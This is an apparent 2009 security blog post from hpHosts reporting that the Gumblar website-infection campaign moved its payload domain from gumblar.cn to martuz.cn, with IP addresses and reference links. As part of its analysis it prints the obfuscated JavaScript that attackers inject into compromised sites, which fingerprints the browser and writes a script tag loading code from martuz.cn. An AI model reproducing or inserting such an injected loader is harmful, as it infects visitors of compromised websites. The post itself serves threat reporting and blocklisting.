Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 18 May 2009

gumblar.cn switches to martuz.cn (95.129.145.58 - netname: NET-VENTREX)

Following on from the reent spate of gumblar.cn infections, we find the malthors have switched to using martuz.cn. gumblar.cn has been inactive for a while now, first resulting in the router at DataHop, UK (195.72.129.125), returning "destination net unavailable" that left it dead, then failing to resolve completely, and now pointing to 71.6.202.216 (California Regional Intranet, Inc.), which results in it's failing to load completely. Incidentally, there's 4 domains resolving to this IP at present.

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain - martuz .cn (95 .129 .145 .58)

The script

(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();


The script looks and acts the same as the gumblar script. All facts we know about the Gumblar apply to Martuz as well. And the removal instructions should be the same.


Read more
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

References

puremis.net is infected?
http://www.mywot.com/en/forum/3406-puremis-net-is-infected

gumblar.cn - 71.6.202.216
http://hosts-file.net/?s=gumblar.cn

martuz.cn - 95.129.145.58
http://hosts-file.net/?s=martuz.cn

No comments: